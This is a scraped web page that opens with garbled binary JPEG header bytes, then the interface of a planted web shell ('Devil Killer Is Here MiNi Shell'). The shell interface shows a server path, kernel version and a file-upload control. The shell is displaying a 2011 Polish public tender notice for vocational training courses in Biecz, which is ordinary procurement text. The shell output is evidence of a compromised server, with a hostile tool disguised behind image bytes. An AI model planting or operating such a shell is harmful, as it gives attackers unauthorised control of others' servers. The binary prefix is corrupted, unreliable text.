JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/138086-N-2011.html

<p class="kh_header"><b>Biecz: Organizacja, przygotowanie i przeprowadzenie szkoleń - warsztatów z zakresu przygotowania zawodowego osób samotnie wychowujących dzieci oraz niepracujących zarejestrowanych lub nie w Powiatowym Urzędzie Pracy, lub pracujących                                  w gospodarstwach rolnych z terenu Gminy Biecz
w ramach Projektu pn. Czas na aktywność w gminie Biecz realizowanego przez Miejsko-Gminny Ośrodek Pomocy Społecznej w Bieczu 
w ramach
Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki,
współfinansowanego przez Unię Europejską ze środków Europejskiego
Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 138086 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Tysiąclecia 5, 38-340 Biecz, woj. małopolskie, tel. 13 447 00 41, faks 13 447 00 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mgopsbiecz@poczta.onet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja, przygotowanie i przeprowadzenie szkoleń - warsztatów z zakresu przygotowania zawodowego osób samotnie wychowujących dzieci oraz niepracujących zarejestrowanych lub nie w Powiatowym Urzędzie Pracy, lub pracujących                                  w gospodarstwach rolnych z terenu Gminy Biecz
w ramach Projektu pn. Czas na aktywność w gminie Biecz realizowanego przez Miejsko-Gminny Ośrodek Pomocy Społecznej w Bieczu 
w ramach
Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki,
współfinansowanego przez Unię Europejską ze środków Europejskiego
Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie usługi szkoleniowej dla 30 osób z terenu Gminy Biecz w ramach projektu systemowego pn.: Czas na aktywność w gminie Biecz, zadanie 1 Aktywna integracja.  Projekt realizowany jest przez Miejsko-Gminny Ośrodek Pomocy Społecznej w Bieczu w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1.Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1.Rozwój i upowszechnianie aktywnej inegracji przez ośrodki pomocy społecznej.

2. Program szkolenia winien być przeprowadzony zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 02 marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz.U. Nr 47 poz.315). 

3. Szczegółowo przedmiot zamówienia opisany został w poniższym zestawieniu szkoleń (modułów). Obejmuje opracowanie zakresu tematycznego, który musi być zgodny z ramowym programem zatwierdzonym przez Miejsko-Gminny Ośrodek Pomocy 
Społecznej w Bieczu. Za godzinę zegarową uznaje się 45 minut zajęć edukacyjnych oraz 15 minut przerwy - istnieje możliwość 
kumulowania przerw. 

4. Przedmiot zamówienia obejmuje opracowanie zakresu tematycznego, który musi być zgodny z ramowym programem zatwierdzonym przez Miejsko-Gminny Ośrodek Pomocy Społecznej w Bieczu  w następujących modułach tematycznych dla: osób samotnie wychowujących dzieci:
-  trening kompetencji rodzicielskich 
-  warsztat integracyjno - motywacyjny 
-  kurs kosmetyczny/kurs stylizacji paznokci 
-  kurs obsługi kasy fiskalnej/kurs obsługi programów magazynowo - fakturujących 
-  kurs przedstawiciela handlowego z prawem jazdy prawo jazdy tylko do poziomu ukończenia kursu) 
oraz dla osób niepracujących zarejestrowanych lub nie w Powiatowym Urzędzie Pracy, lub pracujących w gospodarstwach rolnych:
-  trening kompetencji społecznych
-  kurs kosmetyczny/kurs stylizacji paznokci 
-  kurs obsługi kasy fiskalnej/kurs obsługi programów magazynowo - fakturujących 
-  kurs przedstawiciela handlowego z prawem jazdy prawo jazdy tylko do poziomu ukończenia kursu) 

1) Trening kompetencji rodzicielskich dla osób samotnie wychowujących dzieci: 
przekazanie wiedzy na temat wychowania dzieci-jako procesu długotrwałego, zmiennego w swoich treściach i formach, przedstawienie metod i technik wychowania, zadań rodzicielskich względem dzieci, sposobu i środków oddziaływania na dziecko w taki sposób, by jego rozwój przebiegał harmonijnie, przedstawienie roli rodzica w wychowaniu dziecka, technik aktywnego słuchania i wyrażania swoich emocji, nawiązywanie efektywnej współpracy z dzieckiem, umiejętność aktywnego słuchania i akceptacji uczuć, wspieranie procesu usamodzielniania się dzieci, wyznaczania granic w relacjach rodzinnych, wyciąganie konsekwencji z niewłaściwego zachowania w miejsce karania, zauważanie potrzeb swoich dzieci i umiejętność odpowiadania na nie, modyfikowanie niepożądanych lub nieodpowiednich zachowań bez stosowania przemocy.
Zakres tematyczny:
- cele wychowawcze
- podstawy rodzicielskie
- ochrona własnych granic
- aktywne słuchanie
- potwierdzanie uczuć ćwiczenia
- stosowanie nagród i kar
- postawy rodzicielskie
- analiza sytuacji konfliktowych
Liczba godzin szkoleniowych grupowych (dla grupy 10 osób - minimum 24 godziny w ciągu 3 dni).

2) Warsztat integracyjno - motywacyjny dla osób samotnie wychowujących dzieci:
nauczenie umiejętności budowania samo-motywacji do podejmowania działań, budowania samo-motywacji do wprowadzenia zmian w życiu, nauczenie podstawowych umiejętności poznawania drugiego człowieka. Uświadomienie uczestnikom znaczenia poziomu i jakości motywacji do podejmowania działań i wprowadzania zmian w życiu każdego z nich, podniesienie samoświadomści uczestników szkolenia.
Zakres tematyczny:
- ćwiczenia integracyjne (wywiad z ważną osobą, to co dla mnie najważniejsze, mój prfil - dyskusja, samoprezentacja, ćwiczenia w zakresie rozróżniania kierunków motywacji),
- motywacja (dlaczego cos robimy, podstawowe informacje w zakresie czynników motywacyjnych, ćwiczenia w zakresie rozróżniania kierunków motywacji).
Liczba godzin szkoleniowych grupowych (dla grupy 10 osób  minimum 16 godzin w ciągu 2 dni).

3) Kurs kosmetyczny/kurs stylizacji paznokci dla osób samotnie wychowujących dzieci:
Kurs kosmetyczny dla 1 osoby (minimum 50 godzin w ciągu 7 dni w tym godziny teoretyczne i praktyczne):
- przepisy BHP w salonie kosmetycznym
- wyposażenie stanowiska pracy
- urządzenie gabinetu kosmetycznego
- metody oraz środki do dezynfekcji
- budowa skóry, funkcje skóry
- rodzaje cer i ich charakterystyka (cera normalna, sucha, tłusta, mieszana, zniszczona, starcza, atroficzna, naczynkowa, wrażliwa)
- pielęgnacja twarzy i ciała w gabinecie kosmetycznym (dostosowanie zabiegu do potrzeb klienta, rodzaje zabiegów, wybór zabiegu ze względu na rodzaj cery)
- podstawy dermatologii (najczęściej spotykane schorzenia w gabinecie kosmetycznym, choroby skóry)
- odstawy chemii kosmetycznej (składniki aktywne, zioła)
- wygląd kosmetyczki i podejście do klienta
- wywiad z klientką i dobór odpowiedniego zabiegu 
- demakijaż oczu, twarzy, szyi i dekoltu  
- wykonywanie peelingów (enzymatyczne, drobnoziarniste, gruboziarniste, peelingi do ciała, dłoni, stóp)   
- nakładanie maseczek kremowych (nawilżające, odżywcze, przeciwzmarszczkowe, liftingujące) 
- henna brwi i rzęs 
- regulacja brwi   
- wykonywanie depilacji woskiem poszczególnych partii ciała: wąsik, pachy, bikini, uda, łydki, ręce 

Kurs stylizacji paznokci dla 1 osoby (minimum 40 godzin  w ciągu 5 dni):
a) organizacja pracy stylisty paznokci, zapoznanie z zasadami higieny, BHP i produktami.
b) zasady obowiązujące przy pracy z klientem
c) budowa paznokcia, choroby skóry i przydatków
d) manicure
- biologiczny (przy użyciu frezarki)
- cążkowy
- nauka dokładnego lakierowania paznokci
e) pedicure kosmetyczny (frezarkowy)
f) metoda akrylowa i żelowa
- praca na szablonie
- utwardzanie naturalnej płytki
- budowa perfekcyjnego paznokcia french (idealna smile line, formowanie tunelu)
-  typowe kształty paznokci salonowych - kwadrat, owal, migdał
g) podstawowe techniki zdobień - hologramy, brokat, fimo, linery, zasady dobierania kolorów
h) problemy pojawiające się w codziennej pracy stylistki paznokci
- radzenie sobie z płytką problematyczną
- modelowanie paznokci szerokich, obgryzionych, z bruzdami
- nauka podcinania szablonu do różnych typów płytek paznokcia
Kurs kosmetyczny oraz kurs stylizacji paznokci powinien  odbywać się w nie czynnym  profesjonalnym zakładzie kosmetycznym.
Wykonawca zapewni bezpłatne materiały do praktycznej nauki.
 Zamawiający wymaga, aby Wykonawca zapewnił wszystkim uczestnikom szkoleń zawodowych podstawowe badania lekarskie  przeprowadzone przez lekarza medycyny pracy, uprawnionego do wykonywania takich badań z książeczką zdrowia, które                    w przyszłości będą przydatne do pracy zawodowej. 

4) Kurs obsługi kasy fiskalnej/kurs obsługi programów magazynowo - fakturujących dla osób samotnie wychowujących dzieci:
Szkolenie zawodowe uzupełniające - obsługa programów magazynowo - fakturujących - część teoretyczna i praktyczna:
Zakres tematyczny:
a) obsługa programu Subiekt:
- tabela, lista kontrahentów, towarów i usług, wyszukiwarka Instynkt, typowe elementy okien, funkcje i skróty klawiszowe.
Główne moduły: kartoteka kontrahentów, towarów i usług, dokumenty handlowe, sprzedaż - faktury i rachunki, zakupy - faktury i rachunki, magazyn, finanse, zestawienia, administracja.
Podstawowe pojęcia: podmiot, magazyn, kontrahenci, personel, Urzędy Skarbowe, rachunki bankowe, towary i usługi, dokumenty, kasy, stawki VAT, rabaty, formy płatności, należności i zobowiązania, odsetki, kategorie, grupy, wydruki, urządzenia fiskalne.
b) fakturowanie komputerowe:
-faktury - zakres i zastosowanie: faktura VAT i faktura korygująca, faktury wewnętrzne, faktury: VAT RR, VAT UE, VAT MP, VAT marża, handlowe,
- elementy obowiązkowe faktury,
- zasady wystawiania faktur,
- nierzetelność faktury,
- faktura korygująca a nota korygująca - różnice i zastosowanie,
- faktura przy zaliczce,
- faktury wystawiane elektronicznie,
- faktury wystawiane przez przedstawiciela podatkowego,
- dowody mające wpływ na stawkę opodatkowania podatkiem VAT,
- klasyfikacja statystyczna ważnym elementem faktury,
- czy warto podpisywać faktury?
- praktyczne obowiązki wystawiających i osób księgujących faktury,
c) zasady gospodarki magazynowej:
- Organizacja prac magazynowych w przedsiębiorstwie (przyjęcie, składowanie, kompletowanie, wydawanie).
- Manipulacje materiałami i pakowanie: manipulacje materiałami, podział sprzętu do manipulacji materiałami ze względu na jego konstrukcję i kryteria jego wyboru, opakowanie i jego wymogi projektowe, kody kreskowe, konteneryzacja, koncepcja systemu informacji logistycznej.
d) technologie prac magazynowych: charakterystyka technologicznego procesu magazynowania, proces magazynowy (czynności przyjęcia towarów do magazynu), zasady i kryteria ustalenia miejsc składowania, procedury i dokumenty dostawy, proces magazynowy (czynności kompletacji i wydania z magazynu a w nim: określenie ścieżki kompletacyjnej jedno i dwustopniowej, określenie zasad i miejsc grupowania asortymentów wg  zleceń wydania, przepakowania i zabezpieczania asortymentów do wysyłki, załadunku i wysyłki do odbiorców).
e) BHP na stanowisku pracy osoby fakturującej i magazyniera oraz podstawowe zasady higieny.
f) gospodarka zapasami: znaczenie zapasów, przyczyny utrzymywania zapasów, koszty i klasyfikacja zapasów, podstawowe decyzje w zarządzaniu zapasami, metoda stałej wielkości zamówienia przy znanym i pewnym popycie.
oraz przy niepewnym (nieokreślonym) popycie, metoda stałego okresu zamówienia, tradycyjne metody zarządzania zapasami.
g) inwentaryzacja stanów magazynowych: pobranie aktualnych stanów magazynowych, wydruk spisu z natury dla komisji inwentaryzacyjnej, wprowadzenie ilości spisanych przez komisję do programu, aktualizacja stanów magazynowych, wydruk remanentu, rodzaje inwentaryzacji, inwentaryzacja ręczna, inwentaryzacja elektroniczna prowadzona przy pomocy inwentaryzatora.
f) cele, zadania i wyposażenie magazynu: wymagania dotyczące obiektu magazynowego wynikające z warunków przechowywania, urządzenia do składowania, środki transportu, pomocnicze urządzenia magazynowe, funkcje i rodzaje magazynów.

Liczba godzin szkoleniowych grupowych (dla grupy 7 osób  minimum 90 godzin w ciągu 12 dni).

Zamawiający wymaga, aby Wykonawca zapewnił wszystkim uczestnikom szkoleń zawodowych  podstawowe badania lekarskie  przeprowadzone przez lekarza medycyny pracy, uprawnionego do wykonywania takich badań z książeczką zdrowia, które w przyszłości będą przydatne do pracy zawodowej. 

Wykonawca zapewni bezpłatne materiały do praktycznej nauki, osobne (dla każdego uczestnika szkolenia) stanowiska pracy oraz osobne komputery z legalnymi oprogramowaniami.

5) Kurs przedstawiciela handlowego z prawem jazdy prawo jazdy kat. B (tylko do poziomu ukończenia kursu)   dla 2 osób samotnie wychowujących dzieci:
Kurs: teoretyczny (30 godzin), z zakresu kursu przedstawiciela  handlowego
a) rola i zadania przedstawiciela handlowego ,zakres obowiązków
b) reklama i promocja, pozyskanie klientów, utrzymanie kontaktów handlowych
c) techniki i etapy sprzedaży ,sprzedaż w terenie
d) organizowanie dostaw towarów do klientów, negocjacje, techniki negocjacji
e) zagadnienia finansowo-prawne dotyczące sprzedaży i zawodu handlowca, zażalenia, reklamacje
f) reklama i promocje
g)marketing wystawienniczy
h) komunikacja międzyludzka
Kurs: teoretyczny (30 godzin)- z zakresu kursu prawa jazdy  kat. B
a)	przepisy ruchu drogowego
b)	technika jazdy
Kurs: praktyczny(60 godzin)-z zakresu kursu prawa jazdy kat B
a)zakres z nauki jazdy odbywać się będą na podstawie indywidualnego planu kursanta

Wykonawca zapewni:
a) warunki lokalowe, plac manewrowy (120 m2  wyposażony w pachołki i tyczki ) i wyposażenie dydaktyczne zgodne
 z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 r. Nr 217 poz. 1834 z późn. zm.).
b) sprzęt komputerowy wraz z odpowiednim oprogramowaniem i dodatkowym wyposażeniem umożliwiającym sprawdzenie nabytej przez uczestników wiedzy teoretycznej. Ponadto, Wykonawca zapewni każdemu uczestnikowi kursu bezzwrotny egzemplarz podręcznika dla kandydatów na kurs prawo jazdy kat. B wraz z płytą DVD/CD zawierającą aktualnie obowiązujące zestawy pytań testowych wykorzystywane podczas egzaminu państwowego.
c) realizując praktyczną naukę jazdy, marki samochodów należy dostosować do wymagań Małopolskiego Ośrodka Ruchu Drogowego w Nowym Sączu lub Wojewódzkiego Ośrodka  Ruchu Drogowego w Krośnie.
d) zajęcia będące przedmiotem zamówienia muszą być przeprowadzone przez doświadczoną i wykwalifikowaną kadrę spełniającą wymogi nałożone przepisami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U.                      z  2005 r. Nr 217 poz. 1834 z późn. zm.).
e) W koszt kursu nie wchodzi opłata za pierwszy i ewentualnie kolejne  egzaminy.

Zamawiający wymaga aby Wykonawca zapewnił uczestnikom szkolenia zawodowego badania lekarskie wraz              z zaświadczeniem koniecznym do uczestnictwa w kursie prawa jazdy.

6) Trening kompetencji społecznych dla osób niepracujących zarejestrowanych lub nie w Powiatowym Urzędzie Pracy, lub pracujące w gospodarstwach rolnych:

Celem szkolenia jest: 
- nabycie podstawowych umiejętności i kompetencji społecznych
- dostarczenie wiedzy w zakresie: komunikacji interpersonalnej, treningu asertywności i umiejętności społecznych oraz powstawania konfliktów i sposobów ich rozwiązywania
ponadto:
- nabycie podstawowych umiejętności dobrej komunikacji interpersonalnej, 
- radzenia sobie w sytuacjach trudnych oraz bycia asertywnym.  

Tematyka szkolenia powinna obejmować:
- podstawowe informacje dotyczące dobrej komunikacji, jej cechy, zakłócenia,
- skuteczne komunikowania się z ludźmi,	
- radzenie sobie w sytuacjach trudnych,
- asertywność, jej definicje, najważniejsze elementy, asertywność w życiu i w pracy,
- konflikty i sposoby ich rozwiązywania,
- budowanie własnego wizerunku przez komunikację.

Liczba godzin szkoleniowych grupowych (dla grupy 20 osób - minimum 40 godzin w ciągu 5 dni).

7) Kurs kosmetyczny/kurs stylizacji paznokci dla osób niepracujących zarejestrowanych lub nie                                      w Powiatowym Urzędzie Pracy, lub pracujące w gospodarstwach rolnych:
Kurs kosmetyczny dla 2 osób (minimum 50 godzin w ciągu 7 dni w tym godziny teoretyczne i praktyczne):
- przepisy BHP w salonie kosmetycznym
- wyposażenie stanowiska pracy
- urządzenie gabinetu kosmetycznego
- metody oraz środki do dezynfekcji
- budowa skóry, funkcje skóry
- rodzaje cer i ich charakterystyka (cera normalna, sucha, tłusta, mieszana, zniszczona, starcza, atroficzna, naczynkowa, wrażliwa)
- pielęgnacja twarzy i ciała w gabinecie kosmetycznym (dostosowanie zabiegu do potrzeb klienta, rodzaje zabiegów, wybór zabiegu ze względu na rodzaj cery)
- podstawy dermatologii (najczęściej spotykane schorzenia w gabinecie kosmetycznym, choroby skóry)
- odstawy chemii kosmetycznej (składniki aktywne, zioła)
- wygląd kosmetyczki i podejście do klienta
- wywiad z klientką i dobór odpowiedniego zabiegu 
- demakijaż oczu, twarzy, szyi i dekoltu  
- wykonywanie peelingów (enzymatyczne, drobnoziarniste, gruboziarniste, peelingi do ciała, dłoni, stóp)   
- nakładanie maseczek kremowych (nawilżające, odżywcze, przeciwzmarszczkowe, liftingujące) 
- henna brwi i rzęs 
- regulacja brwi   
- wykonywanie depilacji woskiem poszczególnych partii ciała: wąsik, pachy, bikini, uda, łydki, ręce 

Kurs stylizacji paznokci dla 2 osób (minimum 40 godzin  w ciągu 5 dni):
a) organizacja pracy stylisty paznokci, zapoznanie z zasadami higieny, BHP i produktami.
b) zasady obowiązujące przy pracy z klientem
c) budowa paznokcia, choroby skóry i przydatków
d) manicure
- biologiczny (przy użyciu frezarki)
- cążkowy
- nauka dokładnego lakierowania paznokci
e) pedicure kosmetyczny (frezarkowy)
f) metoda akrylowa i żelowa
- praca na szablonie
- utwardzanie naturalnej płytki
- budowa perfekcyjnego paznokcia french (idealna smile line, formowanie tunelu)
-  typowe kształty paznokci salonowych - kwadrat, owal, migdał
g) podstawowe techniki zdobień - hologramy, brokat, fimo, linery, zasady dobierania kolorów
h) problemy pojawiające się w codziennej pracy stylistki paznokci
- radzenie sobie z płytką problematyczną
- modelowanie paznokci szerokich, obgryzionych, z bruzdami
- nauka podcinania szablonu do różnych typów płytek paznokcia
Kurs kosmetyczny oraz kurs stylizacji paznokci powinien  odbywać się w nie czynnym  profesjonalnym zakładzie kosmetycznym.
Wykonawca zapewni bezpłatne materiały do praktycznej nauki.
 Zamawiający wymaga, aby Wykonawca zapewnił wszystkim uczestnikom szkoleń zawodowych podstawowe badania lekarskie  przeprowadzone przez lekarza medycyny pracy, uprawnionego do wykonywania takich badań z książeczką zdrowia, które           w przyszłości będą przydatne do pracy zawodowej. 

8) Kurs obsługi kasy fiskalnej/kurs obsługi programów magazynowo - fakturujących dla osób niepracujących zarejestrowanych lub nie w Powiatowym Urzędzie Pracy, lub pracujące w gospodarstwach rolnych:
Szkolenie zawodowe uzupełniające - obsługa programów magazynowo - fakturujących - część teoretyczna i praktyczna:
Zakres tematyczny:
a) obsługa programu Subiekt:
- tabela, lista kontrahentów, towarów i usług, wyszukiwarka Instynkt, typowe elementy okien, funkcje i skróty klawiszowe.
Główne moduły: kartoteka kontrahentów, towarów i usług, dokumenty handlowe, sprzedaż - faktury i rachunki, zakupy - faktury i rachunki, magazyn, finanse, zestawienia, administracja.
Podstawowe pojęcia: podmiot, magazyn, kontrahenci, personel, Urzędy Skarbowe, rachunki bankowe, towary i usługi, dokumenty, kasy, stawki VAT, rabaty, formy płatności, należności i zobowiązania, odsetki, kategorie, grupy, wydruki, urządzenia fiskalne.
b) fakturowanie komputerowe:
-faktury - zakres i zastosowanie: faktura VAT i faktura korygująca, faktury wewnętrzne, faktury: VAT RR, VAT UE, VAT MP, VAT marża, handlowe,
- elementy obowiązkowe faktury,
- zasady wystawiania faktur,
- nierzetelność faktury,
- faktura korygująca a nota korygująca - różnice i zastosowanie,
- faktura przy zaliczce,
- faktury wystawiane elektronicznie,
- faktury wystawiane przez przedstawiciela podatkowego,
- dowody mające wpływ na stawkę opodatkowania podatkiem VAT,
- klasyfikacja statystyczna ważnym elementem faktury,
- czy warto podpisywać faktury?
- praktyczne obowiązki wystawiających i osób księgujących faktury,
c) zasady gospodarki magazynowej:
- Organizacja prac magazynowych w przedsiębiorstwie (przyjęcie, składowanie, kompletowanie, wydawanie).
- Manipulacje materiałami i pakowanie: manipulacje materiałami, podział sprzętu do manipulacji materiałami ze względu na jego konstrukcję i kryteria jego wyboru, opakowanie i jego wymogi projektowe, kody kreskowe, konteneryzacja, koncepcja systemu informacji logistycznej.
d) technologie prac magazynowych: charakterystyka technologicznego procesu magazynowania, proces magazynowy (czynności przyjęcia towarów do magazynu), zasady i kryteria ustalenia miejsc składowania, procedury i dokumenty dostawy, proces magazynowy (czynności kompletacji i wydania z magazynu a w nim: określenie ścieżki kompletacyjnej jedno i dwustopniowej, określenie zasad i miejsc grupowania asortymentów wg  zleceń wydania, przepakowania i zabezpieczania asortymentów do wysyłki, załadunku i wysyłki do odbiorców).
e) BHP na stanowisku pracy osoby fakturującej i magazyniera oraz podstawowe zasady higieny.
f) gospodarka zapasami: znaczenie zapasów, przyczyny utrzymywania zapasów, koszty i klasyfikacja zapasów, podstawowe decyzje w zarządzaniu zapasami, metoda stałej wielkości zamówienia przy znanym i pewnym popycie.
oraz przy niepewnym (nieokreślonym) popycie, metoda stałego okresu zamówienia, tradycyjne metody zarządzania zapasami.
g) inwentaryzacja stanów magazynowych: pobranie aktualnych stanów magazynowych, wydruk spisu z natury dla komisji inwentaryzacyjnej, wprowadzenie ilości spisanych przez komisję do programu, aktualizacja stanów magazynowych, wydruk remanentu, rodzaje inwentaryzacji, inwentaryzacja ręczna, inwentaryzacja elektroniczna prowadzona przy pomocy inwentaryzatora.
f) cele, zadania i wyposażenie magazynu: wymagania dotyczące obiektu magazynowego wynikające z warunków przechowywania, urządzenia do składowania, środki transportu, pomocnicze urządzenia magazynowe, funkcje i rodzaje magazynów.

Liczba godzin szkoleniowych grupowych (dla grupy 8 osób  minimum 90 godzin w ciągu  12 dni).
Zamawiający wymaga, aby Wykonawca zapewnił wszystkim uczestnikom szkoleń zawodowych  podstawowe badania lekarskie  przeprowadzone przez lekarza medycyny pracy, uprawnionego do wykonywania takich badań z książeczką zdrowia, które w przyszłości będą przydatne do pracy zawodowej. 

Wykonawca zapewni bezpłatne materiały do praktycznej nauki, osobne (dla każdego uczestnika szkolenia) stanowiska pracy oraz osobne komputery z legalnymi oprogramowaniami.

9) Kurs przedstawiciela handlowego z prawem jazdy prawo jazdy kat. B (tylko do poziomu ukończenia kursu)   dla 10 osób niepracujących zarejestrowanych lub nie w Powiatowym Urzędzie Pracy, lub pracujące w gospodarstwach rolnych:
Kurs teoretyczny (30 godzin), z zakresu kursu przedstawiciela  handlowego
a) rola i zadania przedstawiciela handlowego ,zakres obowiązków
b) reklama i promocja, pozyskanie klientów, utrzymanie kontaktów handlowych
c) techniki i etapy sprzedaży ,sprzedaż w terenie
d) organizowanie dostaw towarów do klientów, negocjacje, techniki negocjacji
e) zagadnienia finansowo-prawne dotyczące sprzedaży i zawodu handlowca, zażalenia, reklamacje
f) reklama i promocje
g)marketing wystawienniczy
h) komunikacja międzyludzka
Kurs teoretyczny (30 godzin)- z zakresu kursu prawa jazdy  kat. B
c)	przepisy ruchu drogowego
d)	technika jazdy
